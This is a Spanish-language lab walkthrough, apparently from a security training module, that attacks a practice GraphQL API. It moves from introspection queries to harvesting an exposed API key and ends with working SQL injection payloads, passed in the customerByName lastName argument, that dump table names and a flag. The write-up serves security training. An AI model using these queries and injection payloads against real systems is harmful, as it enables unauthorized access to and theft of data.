Attacking GraphQL

Target(s): 94.237.55.43:30165

Escenario

Se le ha encomendado realizar una evaluación de seguridad de la aplicación web de un cliente. Aplique lo que ha aprendido en este módulo para obtener la flag.

Pregunta 1: Aprovecha la vulnerabilidad de la API GraphQL para obtener la flag.

Accedemos al endpoint /graphql desde el navegador:

Haremos una query de las queries de GraphQL permitidas:

{
    __schema {
        queryType {
            fields {
                name
                description
            }
        }
    }
}

Target(s): 83.136.252.171:47901

Ejecutamos una query de introspection para mostrar los types del schema:

{
  __schema {
    types {
      name
    }
  }
}

Hay varios que podrían interesarnos como los de Add, el de Mutation, etc. Obtendremos el nombre de todos los campos del type AddEmployee con otra query:

{
  __type(name: "AddEmployee") {
    name
    fields {
      name
      type {
        name
        kind
      }
    }
  }
}

Hacemos lo mismo con el type Mutation:

{
  __type(name: "Mutation") {
    name
    fields {
      name
      type {
        name
        kind
      }
    }
  }
}

Ejecutamos la query de schema que nos da GraphQL Voyager:

query IntrospectionQuery {
      __schema {
        
        queryType { name kind }
        mutationType { name kind }
        subscriptionType { name kind }
        types {
          ...FullType
        }
        directives {
          name
          description
          
          locations
          args {
            ...InputValue
          }
        }
      }
    }

    fragment FullType on __Type {
      kind
      name
      description
      
      
      fields(includeDeprecated: true) {
        name
        description
        args {
          ...InputValue
        }
        type {
          ...TypeRef
        }
        isDeprecated
        deprecationReason
      }
      inputFields {
        ...InputValue
      }
      interfaces {
        ...TypeRef
      }
      enumValues(includeDeprecated: true) {
        name
        description
        isDeprecated
        deprecationReason
      }
      possibleTypes {
        ...TypeRef
      }
    }

    fragment InputValue on __InputValue {
      name
      description
      type { ...TypeRef }
      defaultValue
      
      
    }

    fragment TypeRef on __Type {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
                ofType {
                  kind
                  name
                  ofType {
                    kind
                    name
                    ofType {
                      kind
                      name
                      ofType {
                        kind
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }

Copiamos y pegamos el resultado que nos da en GraphQL Voyager y le damos a display:

Visualizando el esquema vamos a intentar obtener activeApiKeys:

{
  __type(name: "ApiKeyObject") {
    name
    fields {
      name
      type {
        name
        kind
      }
    }
  }
}

Enumeramos las API keys existentes:

{
  activeApiKeys {
    id
    role
    key
  }
}

Antes en la consulta de GraphQL Voyager hemos identificado que hay dos queries que requieren API KEY:
1. allCustomers
2. customerByName

Ejecutamos primero la query allCustomers:

{
  allCustomers(apiKey: "0711a879ed751e63330a78a4b195bbad") {
    id
    firstName
    lastName
    address
  }
}

Ejecutamos la query customerByName indicando el lastName ahora que los tenemos disponibles:

{
  customerByName(
    apiKey: "0711a879ed751e63330a78a4b195bbad",
    lastName: "Blair"
  ) {
    id
    firstName
    lastName
    address
  }
}

Lo repetimos con los otros 2 usuarios:

Los ID coinciden y parecen estar codificados en base64:

Target(s): 94.237.56.254:54956

Continuamos utilizando la API key, esta vez para una inyección SQL y obtener los nombres de tablas de la bbdd:

{
  customerByName(
    apiKey: "0711a879ed751e63330a78a4b195bbad",
    lastName: "' UNION SELECT table_name, table_name, table_name, table_name FROM information_schema.tables-- "
  ) {
    firstName
    lastName
    address
  }
}

La primera tabla que identificamos es ALL_PLUGINS. Vamos a identificar el resto con el siguiente payload que hemos visto en la teoría pero adaptado a este escenario:

{
  customerByName(
    apiKey: "0711a879ed751e63330a78a4b195bbad",
    lastName: "x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4 FROM information_schema.tables WHERE table_schema=database()-- -"
  ) {
    firstName
    lastName
    address
  }
}

Hemos identificado la tabla flag. Utilizaremos el siguiente payload para extrar la flag:

{
  customerByName(
    apiKey: "0711a879ed751e63330a78a4b195bbad",
    lastName: "x' UNION SELECT 1,2,GROUP_CONCAT(flag),4 FROM flag-- -"
  ) {
    firstName
    lastName
    address
  }
}

AnteriorFile Inclusion SiguienteAPI Attacks

Última actualización hace 3 meses

hashtagEscenario

Escenario